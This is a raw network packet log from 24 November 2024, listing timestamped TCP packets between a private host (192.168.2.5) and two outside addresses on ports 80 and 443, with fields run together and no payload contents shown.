                                                                                                                                                                                        Nov 24, 2024 02:13:27.754105091 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.755626917 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:27.755676985 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.756217003 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:27.756232023 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.858582020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.858659029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.858722925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.859030008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.859081984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.859133005 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.859848022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.859911919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.859961987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.860687017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.860825062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.861489058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.861545086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.861603022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.861860037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.862328053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.862432957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.863179922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.863230944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.863281965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.864001036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.864049911 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.864101887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.864149094 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.864850998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.864875078 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.864921093 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.865745068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.865859032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.865905046 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.866539955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.866647005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.866695881 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.867338896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.867445946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.867659092 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.868171930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.868290901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.868339062 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.869023085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.869137049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.869853973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.869904041 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.869952917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.870039940 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.870681047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.870795012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.871190071 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.871512890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.871639967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.871685982 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.872361898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.872488022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.872549057 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.873166084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.873282909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.873336077 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.874007940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.874116898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.874164104 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.874846935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.874967098 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.875027895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.875674009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.875798941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.875847101 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.876530886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.876658916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.876729012 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.877345085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.877459049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.877523899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.878175974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.878288984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.879014015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.879064083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.879113913 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.879247904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.879858017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.879966974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.880017042 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.880686998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.880815983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.880862951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.881516933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.881623983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.882383108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.882396936 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.882576942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.882616997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.883207083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.883310080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.883353949 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.884028912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.884150028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.884197950 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.884849072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.884933949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.884983063 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.885691881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.885807037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.886519909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.886569023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.886622906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.887249947 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.887343884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.887444019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.887490988 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.888197899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.888309002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.888356924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.889017105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.889142990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.889192104 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.889847994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.889971972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.890019894 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.890705109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.890819073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.891256094 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.891508102 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.891639948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.892354012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.892409086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.892456055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.892515898 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.893186092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.893277884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.894035101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.894088030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.894141912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.894866943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.894921064 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.894973993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.895020008 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.895704031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.895802975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.895874977 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.896532059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.896646023 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.896779060 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.897368908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.897490978 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.897600889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.898205042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.898314953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.898367882 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.899039984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.899146080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.899271011 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.899868965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.899986982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.900032043 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.900717020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.900842905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.900897980 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.901537895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.901726961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.901774883 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.902323961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.947159052 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.999707937 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.000251055 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.000268936 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.000858068 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.000863075 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.014497995 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.025796890 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.058145046 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.058677912 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.058692932 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.059165001 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.059170961 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.120462894 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.121306896 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.121328115 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.121788025 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.121793032 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.144927025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.145050049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.147274017 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.152555943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.152640104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.152863979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.152919054 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.153002977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.153112888 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.153712034 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.153836012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.153938055 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156539917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156589985 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156605959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156641960 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156677008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156694889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156713963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156729937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156745911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156745911 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156765938 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.156842947 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.157507896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.157619953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.157843113 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.158092976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.158209085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.158337116 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.158961058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.159034967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.159133911 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.159759045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.159888029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.159986973 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.160587072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.160702944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.160804033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.161431074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.161551952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.161596060 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.162256956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.162369013 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.162420988 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.163105965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.163216114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.163270950 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.163938999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.164052963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.164156914 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172822952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172887087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172903061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172934055 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172939062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172954082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172969103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172979116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.172981977 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173007965 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173093081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173109055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173125029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173130035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173141956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173157930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173160076 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173172951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173187971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173191071 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173204899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173229933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173235893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173247099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173261881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173276901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173286915 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173291922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173307896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173309088 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173326015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173333883 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173358917 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.173404932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.174173117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.174217939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.174282074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.174999952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.175036907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.175103903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.175817013 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.175860882 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.175888062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.176652908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.176692963 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.176733971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.177478075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.177516937 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.177561045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.178319931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.178373098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.178419113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.179133892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.179210901 CET4972980192.168.2.5185.215.113.16
